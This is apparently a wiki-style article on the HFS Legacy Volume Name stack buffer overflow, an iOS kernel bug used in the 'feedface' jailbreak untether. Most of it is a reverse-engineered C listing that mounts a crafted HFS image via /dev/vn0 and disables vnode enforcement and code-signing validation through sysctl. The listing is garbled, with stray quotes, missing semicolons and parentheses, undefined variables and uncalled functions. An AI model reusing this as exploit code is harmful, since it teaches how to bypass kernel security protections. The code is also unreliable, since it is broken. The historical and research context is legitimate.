HFS Legacy Volume Name Stack Buffer Overflow

The HFS Legacy Volume Name Stack Buffer Overflow is a kernel vulnerability used to achieve an untethered jailbreak. Its exploit implementation, dubbed "feedface," was used in conjunction with limera1n's bootrom exploit or the usb_control_msg(0xA1, 1) Exploit in greenpois0n.

Exploiting the Kernel Bug
This stack buffer overflow relies on the hfs_mdb file in feedface, when the untether is ran it uses hfs_mdb to take control of PC register and do basically whatever you want, in that case, they used a function called real_payload that patched the kernel and patched the sandbox. After some reverse engineering, here's what the untether looked like.

int mnt_our_hfs {  struct hfs_mount_args i;   bzero(i, sizeof(i)); i.fspec = (int)"/dev/vn0"; i.hfs_uid = args.hfs_gid = 99; i.hfs_mask = 0x1C5; puts("[+]Triggering the kernel exploit"); mount("hfs", "mnt/", MNT_RDONLY, i); return puts("[+] Payload was successful"); }

int prep_vn {  vn_ioctl vn; int i = open("/dev/vn0", O_RDONLY, 0); if(i < 0){ puts("[-]Can't open /dev/vn0"); exit(1); }  ioctl(i, VNIOCDETACH, &vn); vn.vn_file = (int)"/usr/lib/hfs_mdb"; vn.vn_control = vncontrol_readwrite_io_e; if(ioctl(i, VNIOCATTACH, &vn) < 0) {     puts("[-]Coudn't attach to /dev/vn0")'' close(i); exit(1); }  return close(1); } int main(int argc, char const *argv[]) {  int result; struct stat i;  uint32_t zero = 0, one = 1; sysctlbyname("security.mac.vnode_enforce", 0, 0, &zero, sizeof(uint32_t)); sysctlbyname("vm.cs_validation", 0, 0, &zero, sizeof(uint32_t)) prep_vn; i.st_uid = 0; i.st_gid = 0; i.st_rdev = 0; i.st_atimespec.tv_nsec = 0; i.st_atimespec.tv_sec = 0; i.st_mtimespec.tv_nsec = 0; i.st_mtimespec.tv_sec = 0; i.st_ctimespec.tv_sec = 0; i.st_dev = (dev_t)"/dev/vn0"; i.st_ino = 99; i.st_uid = 453; puts("[+]Trigger kernel exploit"); mnt_our_hfs; sysctlbyname("security.mac.vnode_enforce", 0, 0, &one, sizeof(uint32_t)); patch_kernel; return 0; }

Credit
jan0, pod2g, Posixninja

Sources for information

 * TwitLonger
 * http://pastie.org/2060071 (from a tweet by jan0)
 * BlackHat Presentation by I0n1c (starting at slide 24)